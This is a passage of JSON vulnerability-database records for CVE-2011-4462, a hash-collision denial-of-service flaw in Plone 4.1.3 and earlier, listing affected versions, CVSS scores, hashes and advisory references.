"cpe:2.3:a:plone:plone:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.5.1:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2011-4462"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-20"], "description": "Plone 4.1.3 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:01:28", "references": [{"idList": ["GHSA-PCWM-8JC3-QXVJ"], "type": "github"}, {"idList": ["SECURITYVULNS:DOC:27500"], "type": "securityvulns"}, {"idList": ["SSV:26121"], "type": "seebug"}], "rev": 2}, "score": {"modified": "2020-09-21T14:01:28", "rev": 2, "value": 5.5, "vector": "NONE"}}, "hash": "6a3c90f40df7b54cc860b9c33544276393f5dd3f67c2c7056024092a5b5d7b15", "hashmap": [{"hash": "bcb9298e9dedfc5a20fdb3b772b56354", "key": "cvelist"}, {"hash": "13f9056adf02b8cd9f68359a4c55c94c", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "8ee79e05af07bf9f5b1f16b80ef48a0f", "key": "description"}, {"hash": "272f4cdb9efa2b45de25b45c68585342", "key": "title"}, {"hash": "25d8c9d6f2d4709ad0ad6212d8369d9c", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "b83b72f8535b4a135351c45b03cd9b84", "key": "affectedSoftware"}, {"hash": "63d1dafed59d9bded2a524b239235cfd", "key": "published"}, {"hash": "85fc9715d07b57d9e72056856b007c7b", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "736a1ed0b7d76613eddb0b0826033359", "key": "references"}, {"hash": "41b62a8aa1ee5c40897717cadc30784a", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "ef8dc55e27badb345f85c3696c61eb1d", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4462", "id": "CVE-2011-4462", "lastseen": "2020-09-21T14:01:28", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-12-30T01:55:00", "references": ["http://www.nruns.com/_downloads/advisory28122011.pdf", "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html", "http://secunia.com/advisories/47406", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/72018"], "reporter": "cve@mitre.org", "title": "CVE-2011-4462", "type": "cve", "viewCount": 6}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:01:28"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.9"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.7"}, {"cpeName": "plone:plone", "name": "plone", "operator": "le", "version": "4.1.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.5.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.7"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:plone:plone:3.1.5.1", "cpe:/a:plone:plone:2.5.3", "cpe:/a:plone:plone:3.3.5", "cpe:/a:plone:plone:2.0.1", "cpe:/a:plone:plone:4.1.3", "cpe:/a:plone:plone:1.0", "cpe:/a:plone:plone:3.0", "cpe:/a:plone:plone:4.0.5", "cpe:/a:plone:plone:1.0.1", "cpe:/a:plone:plone:4.0.2", "cpe:/a:plone:plone:2.5.2", "cpe:/a:plone:plone:2.5.4", "cpe:/a:plone:plone:4.0", "cpe:/a:plone:plone:3.0.1", "cpe:/a:plone:plone:3.0.2", "cpe:/a:plone:plone:3.2", "cpe:/a:plone:plone:4.0.7", "cpe:/a:plone:plone:3.0.6", "cpe:/a:plone:plone:1.0.4", "cpe:/a:plone:plone:3.3.1", "cpe:/a:plone:plone:4.0.3", "cpe:/a:plone:plone:2.0.5", "cpe:/a:plone:plone:4.0.4", "cpe:/a:plone:plone:3.3.6", "cpe:/a:plone:plone:2.0", "cpe:/a:plone:plone:3.2.1", "cpe:/a:plone:plone:3.1.6", "cpe:/a:plone:plone:3.3", "cpe:/a:plone:plone:3.3.3", "cpe:/a:plone:plone:3.2.3", "cpe:/a:plone:plone:3.0.5", "cpe:/a:plone:plone:4.1.1", "cpe:/a:plone:plone:2.5.5", "cpe:/a:plone:plone:4.0.1", "cpe:/a:plone:plone:2.1.3", "cpe:/a:plone:plone:3.1.2", "cpe:/a:plone:plone:1.0.5", "cpe:/a:plone:plone:2.5.1", "cpe:/a:plone:plone:3.1.7", "cpe:/a:plone:plone:2.1.2", "cpe:/a:plone:plone:3.1.3", "cpe:/a:plone:plone:3.3.2", "cpe:/a:plone:plone:2.0.2", "cpe:/a:plone:plone:3.1", "cpe:/a:plone:plone:2.1", "cpe:/a:plone:plone:3.3.4", "cpe:/a:plone:plone:4.1", "cpe:/a:plone:plone:1.0.2", "cpe:/a:plone:plone:3.2.2", "cpe:/a:plone:plone:1.0.6", "cpe:/a:plone:plone:3.1.1", "cpe:/a:plone:plone:1.0.3", "cpe:/a:plone:plone:4.1.2", "cpe:/a:plone:plone:2.0.3", "cpe:/a:plone:plone:4.0.9", "cpe:/a:plone:plone:2.0.4", "cpe:/a:plone:plone:3.0.3", "cpe:/a:plone:plone:2.5", "cpe:/a:plone:plone:2.1.1", "cpe:/a:plone:plone:2.1.4", "cpe:/a:plone:plone:3.1.4", "cpe:/a:plone:plone:3.0.4"], "cpe23": ["cpe:2.3:a:plone:plone:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:plone:plone:3.1.5.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1.3:*:*:*:*:*:*:*", "versionEndIncluding": "4.1.3", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:2.5.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.0.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.9:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.3.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.1.5.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:1.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:3.2.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:plone:plone:4.0.2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2011-4462"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-20"], "description": "Plone 4.1.3 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-12-09T19:39:12", "references": [{"idList": ["GHSA-PCWM-8JC3-QXVJ"], "type": "github"}, {"idList": ["SECURITYVULNS:DOC:27500"], "type": "securityvulns"}, {"idList": ["SSV:26121"], "type": "seebug"}], "rev": 2}, "score": {"modified": "2020-12-09T19:39:12", "rev": 2, "value": 5.5, "vector": "NONE"}}, "extraReferences": [], "hash": "8ebca43c7515d6cd05d115e6df8a2ec67f51861f2b383f34397f9a311e5b7ca4", "hashmap": [{"hash": "19e5f52d89b2f1049b95fe11b3e2f92d", "key": "cpeConfiguration"}, {"hash": "bcb9298e9dedfc5a20fdb3b772b56354", "key": "cvelist"}, {"hash": "13f9056adf02b8cd9f68359a4c55c94c", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "8ee79e05af07bf9f5b1f16b80ef48a0f", "key": "description"}, {"hash": "272f4cdb9efa2b45de25b45c68585342", "key": "title"}, {"hash": "25d8c9d6f2d4709ad0ad6212d8369d9c", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "b83b72f8535b4a135351c45b03cd9b84", "key": "affectedSoftware"}, {"hash": "63d1dafed59d9bded2a524b239235cfd", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "85fc9715d07b57d9e72056856b007c7b", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "736a1ed0b7d76613eddb0b0826033359", "key": "references"}, {"hash": "41b62a8aa1ee5c40897717cadc30784a", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "ef8dc55e27badb345f85c3696c61eb1d", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4462", "id": "CVE-2011-4462", "lastseen": "2020-12-09T19:39:12", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-12-30T01:55:00", "references": ["http://www.nruns.com/_downloads/advisory28122011.pdf", "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html", "http://secunia.com/advisories/47406", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/72018"], "reporter": "cve@mitre.org", "title": "CVE-2011-4462", "type": "cve", "viewCount": 8}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-12-09T19:39:12"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.9"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.7"}, {"cpeName": "plone:plone", "name": "plone", "operator": "le", "version": "4.1.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.4"}, {"cpeName": 